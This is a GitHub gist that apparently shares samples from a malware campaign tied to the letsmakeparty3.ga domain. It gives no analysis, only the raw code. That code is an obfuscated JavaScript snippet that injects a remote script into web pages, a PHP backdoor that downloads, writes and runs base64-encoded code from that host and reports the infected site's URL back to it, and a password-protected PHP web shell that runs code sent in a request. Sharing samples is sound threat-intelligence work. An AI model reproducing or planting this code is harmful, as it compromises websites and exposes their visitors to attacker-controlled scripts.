Skip to content

Instantly share code, notes, and snippets.

@malwador
Last active July 9, 2020 19:15
Show Gist options
  • Save malwador/fe1c454727a1fbdc4aa3f72adf7f1375 to your computer and use it in GitHub Desktop.
Save malwador/fe1c454727a1fbdc4aa3f72adf7f1375 to your computer and use it in GitHub Desktop.
Samples for Malware Campaign using the letsparty3[.]ga domain
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
<?php function makemee(){$n2 = "base64_decode";$c1 = chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(108).chr(101).chr(116).chr(115).chr(109).chr(97).chr(107).chr(101).chr(112).chr(97).chr(114).chr(116).chr(121).chr(51).chr(46).chr(103).chr(97).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116); $b = "sdfsd234"; file_put_contents($b,"<?php ".$n2(file_get_contents($c1))); include($b);unlink($b);
$actual_link = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(108).chr(101).chr(116).chr(115).chr(109).chr(97).chr(107).chr(101).chr(112).chr(97).chr(114).chr(116).chr(121).chr(51).chr(46).chr(103).chr(97).chr(47).chr(115).chr(46).chr(112).chr(104).chr(112).chr(63).chr(109).chr(61).chr(115).chr(38).chr(115).chr(61).$actual_link);}$lastRunLog = "./e.log";if (file_exists($lastRunLog)) { $lastRun = file_get_contents($lastRunLog);if (time() - $lastRun >= 6400) {makemee(); file_put_contents($lastRunLog, time()); }} else {makemee();file_put_contents($lastRunLog, time());}?><?php if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110); $n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); $z3 = $b2($_REQUEST[chr(100).chr(49)]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } ?>
<script type=text/javascript src='https://letsmakeparty3.ga/l.js?i=1'></script>
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment